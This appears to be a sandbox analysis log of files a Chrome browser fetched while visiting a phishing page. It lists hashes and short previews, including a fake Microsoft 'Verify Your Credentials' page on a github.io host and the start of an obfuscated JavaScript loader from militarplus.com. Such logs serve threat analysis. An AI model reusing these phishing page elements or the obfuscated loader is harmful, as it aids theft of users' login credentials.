                                                        Entropy (8bit):3.75
                                                        Encrypted:false
                                                        SSDEEP:3:HNKiCRn:tcRn
                                                        MD5:5BA03DE6E59E9D480CB5365DE05898D7
                                                        SHA1:0A94C5031898F6406F21E3BA97B37E807E870D77
                                                        SHA-256:D773B2922C4C0AD9E5E0E0F672FA046134FAA9D97C911CDB04D46D0553A80296
                                                        SHA-512:026006CE9A0E0702352DBD1AB987B6FC7838AA55445C656FAAE3E058A3E4F3253DC3C6535095BF737A1F49C1C1EEC64A4A52B23366107B27D0230E3EFFDECF5A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAnfie8LRALzWxIFDThY02g=?alt=proto
                                                        Preview:CgkKBw04WNNoGgA=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:RIFF (little-endian) data, Web/P image
                                                        Category:dropped
                                                        Size (bytes):21952
                                                        Entropy (8bit):6.000526798761754
                                                        Encrypted:false
                                                        SSDEEP:384:hnvlVsJ4cFGPn3+/tzr7QzUcpjaMO+XFsVjEEfkvVvFAEnea:tXs0+tr7syFAleEnea
                                                        MD5:6E06FCCD0F838022DE15659D2F992216
                                                        SHA1:954F0761FCBA03599AED418771AFB462245F67D0
                                                        SHA-256:A0084F2494BEF5E546D230E681B1502FC738975AEA4A1FD3E76E4E76C5913F66
                                                        SHA-512:5E9D8364431EFE94397AD36652B9660C24685989AF9BA7449CC15E117E4D207C7B290E0615DB7901FE9859D708A9DFBB39794F32312384FDA8E7DD12C48E5E2A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:RIFF.U..WEBPVP8X..............VP8 .........* . .>=..C.!.... ......;....Ml...Gk....y..g..z<.C5......(q........C..`.........`..&.vz...j.K...8.N...W....N....0..........}].....8.......H..bEz..gw6^.>..E".....P.\..e...7;~...}.1`..q...~..2.S...%{U....@..6O$e....r.........2....W....F.k....9y.U..V......Uq.'.....k......#.Y.;.m4.........(.Z......e.Y........-.........P.S...]o..y.......z?...N..tl.g6..L..B.d..[aD.KR..c...}.$t>...|d1. ..P.+.O...|t..M.g..4A.$u.].#.+.._..+..$Bq/..\........./..|#.K)..0...XMP .S..<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c137 79.159768, 2016/08/11-13:24:42 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://n
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                        Category:downloaded
                                                        Size (bytes):1435
                                                        Entropy (8bit):7.8613342322590265
                                                        Encrypted:false
                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                        Category:downloaded
                                                        Size (bytes):2407
                                                        Entropy (8bit):7.900400471609788
                                                        Encrypted:false
                                                        SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                        MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                        SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                        SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                        SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                                        Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7190), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):19100
                                                        Entropy (8bit):5.951800676575783
                                                        Encrypted:false
                                                        SSDEEP:384:EWRiUXgWs/72+4C4iSL8lA88kdeeeet6FypQ6L76BhaxY1dk:e72QSt88+eeeet6FyKg76BQydk
                                                        MD5:4C5DD488939F51D1B8FF20EB1E0940E9
                                                        SHA1:F5FD51363CCF9572BFD654482E6FD635B6D44889
                                                        SHA-256:FC14EBB27D8BABB636F9D63F1A6D3F70F6E5967FE00987CDC3BEA31F6EEBAD64
                                                        SHA-512:3A4DDACEE7F31B9FD5B67E9424228E43041D56765CA9A47B241EE1787EEBD2642DB036DFE5FC2193349471581A3F51A4B38DA68D8A0417A5426F38F404C59867
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:........<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <script>.. // Titles array with different variations.. const titles = [....... "Authenticate Your Identity",.. "Identity Verification Needed",.. "Identity Confirmation Required",.. "Secure Your Access",.. "Verify Your Credentials",.. "Confirm Your Account",.. "Identity Check",.. "Confirm Your Identity",.. "Verify Your Details",.. "Confirm Your Personal Information".. ];.... // Function to select a random title.. function setRandomTitle() {.. const randomIndex = Math.floor(Math.random() * titles.length);.. document.title = titles[randomIndex];.. }.... // Set random title on page load.. window.onload = setRandomTitle;.. </script>.. .. <st
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                        Category:dropped
                                                        Size (bytes):100225
                                                        Entropy (8bit):4.51723493121579
                                                        Encrypted:false
                                                        SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAu:ix2wtA4+eS6e6+XE3TLJCLIlAu
                                                        MD5:6296F7B759A27C9A7814E8646BF2C9AA
                                                        SHA1:AECCC30A17E4B31E1C2BB6C3AA579512869967F4
                                                        SHA-256:88885CAD78B58B380802ADDB1A026C4A1235C1C5CA734C4E2016500FCB078FC8
                                                        SHA-512:79642B7D1CC68087B0D72E5042BB6549930A1BE79EE36BA639AE7C6D20D754AD9A9A9382861C963E6F6E6813B9C3184382A7C4F8F815574EC4A7B14D68AB88DA
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):2228
                                                        Entropy (8bit):7.82817506159911
                                                        Encrypted:false
                                                        SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                        MD5:EF9941290C50CD3866E2BA6B793F010D
                                                        SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                        SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                        SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                        Category:downloaded
                                                        Size (bytes):100225
                                                        Entropy (8bit):4.51723493121579
                                                        Encrypted:false
                                                        SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAu:ix2wtA4+eS6e6+XE3TLJCLIlAu
                                                        MD5:6296F7B759A27C9A7814E8646BF2C9AA
                                                        SHA1:AECCC30A17E4B31E1C2BB6C3AA579512869967F4
                                                        SHA-256:88885CAD78B58B380802ADDB1A026C4A1235C1C5CA734C4E2016500FCB078FC8
                                                        SHA-512:79642B7D1CC68087B0D72E5042BB6549930A1BE79EE36BA639AE7C6D20D754AD9A9A9382861C963E6F6E6813B9C3184382A7C4F8F815574EC4A7B14D68AB88DA
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://militarplus.com/m/jsnom.js
                                                        Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                        Category:downloaded
                                                        Size (bytes):199
                                                        Entropy (8bit):6.766983163126765
                                                        Encrypted:false
                                                        SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                        MD5:21B761F2B1FD37F587D7222023B09276
                                                        SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                        SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                        SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                                        Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (3909)
                                                        Category:downloaded
                                                        Size (bytes):9115
                                                        Entropy (8bit):6.0587900718391925
                                                        Encrypted:false
                                                        SSDEEP:192:Ywnb1iC9OA9XXMa9kukrALQDUnulGVopLAGCALQD6vnglET31iCLL3d:7B8H3DUulGmmv3D6vglETliCfN
                                                        MD5:1EB970CE5A18BEC7165F016DF8238566
                                                        SHA1:9EFD1514AF80FE14DB4ED28E9BC53975B9EE089C
                                                        SHA-256:70D613E3ACFBA24FD2876FCBACAF639E1E111EF4D54BAF70761C47673F37D6A3
                                                        SHA-512:21B4D800CC282CA452F7394E95D5382340AC3481A002C21DA681005A44F18EA6CF43959990CD715B4657F180E0E96D6087FE724F3200E909F9FD70EBCD5511BD
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://procustodiavalueslive.github.io/favicon.ico
                                                        Preview:<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'">. <title>Site not found &middot; GitHub Pages</title>. <style type="text/css" media="screen">. body {. background-color: #f1f1f1;. margin: 0;. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;. }.. .container { margin: 50px auto 40px auto; width: 600px; text-align: center; }.. a { color: #4183c4; text-decoration: none; }. a:hover { text-decoration: underline; }.. h1 { width: 800px; position:relative; left: -100px; letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px 0 50px 0; text-shadow: 0 1px 0 #fff; }. p { color: rgba(0, 0, 0, 0.5); margin: 20px 0; line-height: 1.6; }.. ul { list-style: none; margin: 25px 0; padding: 0; }. li { d
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                        Category:downloaded
                                                        Size (bytes):673
                                                        Entropy (8bit):7.6596900876595075
                                                        Encrypted:false
                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7190), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):19100
                                                        Entropy (8bit):5.951800676575783
                                                        Encrypted:false
                                                        SSDEEP:384:EWRiUXgWs/72+4C4iSL8lA88kdeeeet6FypQ6L76BhaxY1dk:e72QSt88+eeeet6FyKg76BQydk
                                                        MD5:4C5DD488939F51D1B8FF20EB1E0940E9
                                                        SHA1:F5FD51363CCF9572BFD654482E6FD635B6D44889
                                                        SHA-256:FC14EBB27D8BABB636F9D63F1A6D3F70F6E5967FE00987CDC3BEA31F6EEBAD64
                                                        SHA-512:3A4DDACEE7F31B9FD5B67E9424228E43041D56765CA9A47B241EE1787EEBD2642DB036DFE5FC2193349471581A3F51A4B38DA68D8A0417A5426F38F404C59867
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/
                                                        Preview:........<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <script>.. // Titles array with different variations.. const titles = [....... "Authenticate Your Identity",.. "Identity Verification Needed",.. "Identity Confirmation Required",.. "Secure Your Access",.. "Verify Your Credentials",.. "Confirm Your Account",.. "Identity Check",.. "Confirm Your Identity",.. "Verify Your Details",.. "Confirm Your Personal Information".. ];.... // Function to select a random title.. function setRandomTitle() {.. const randomIndex = Math.floor(Math.random() * titles.length);.. document.title = titles[randomIndex];.. }.... // Set random title on page load.. window.onload = setRandomTitle;.. </script>.. .. <st
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):68
                                                        Entropy (8bit):4.835131731013994
                                                        Encrypted:false
                                                        SSDEEP:3:pg8BH3a8r9/1qiddO8k0kL62:p5BX5rPZddOW2
                                                        MD5:1FF88D7E6CE0EFFEC359C41A6ED77C2F
                                                        SHA1:0A7EF1924FB8FC49B70126C75A0E3476688A1E56
                                                        SHA-256:842DD742BBF5C87477A45B6D5F9DC0DE51109F24BFEFAC949E6902ED367ABFF2
                                                        SHA-512:D974F02AF3F19FD743E957F60794499F343FBDB0ACB6A71A55B13F8E0A237E00C859D3528655BE09294107850D6976B561BF0A32FB7B6DA7E44105E29C1E1E66
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSJQmWj_g2LsjEmBIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                                        Preview:CjAKCw2RYZVOGgQICRgBCgcNNYZUHBoACgsNkWGVThoECAkYAQoLDZFhlU4aBAgJGAE=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (49854)
                                                        Category:downloaded
                                                        Size (bytes):49993
                                                        Entropy (8bit):5.216475744251136
                                                        Encrypted:false
                                                        SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                        MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                        SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                        SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                        SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                        Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):2228
                                                        Entropy (8bit):7.82817506159911
                                                        Encrypted:false
                                                        SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                        MD5:EF9941290C50CD3866E2BA6B793F010D
                                                        SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                        SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                        SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                        Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                        Category:downloaded
                                                        Size (bytes):276
                                                        Entropy (8bit):7.316609873335077
                                                        Encrypted:false
                                                        SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                        MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                        SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                        SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                        SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                        Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                        Category:dropped
                                                        Size (bytes):673
                                                        Entropy (8bit):7.6596900876595075
                                                        Encrypted:false
                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                        Malicious:false
                                                        Reputation:low
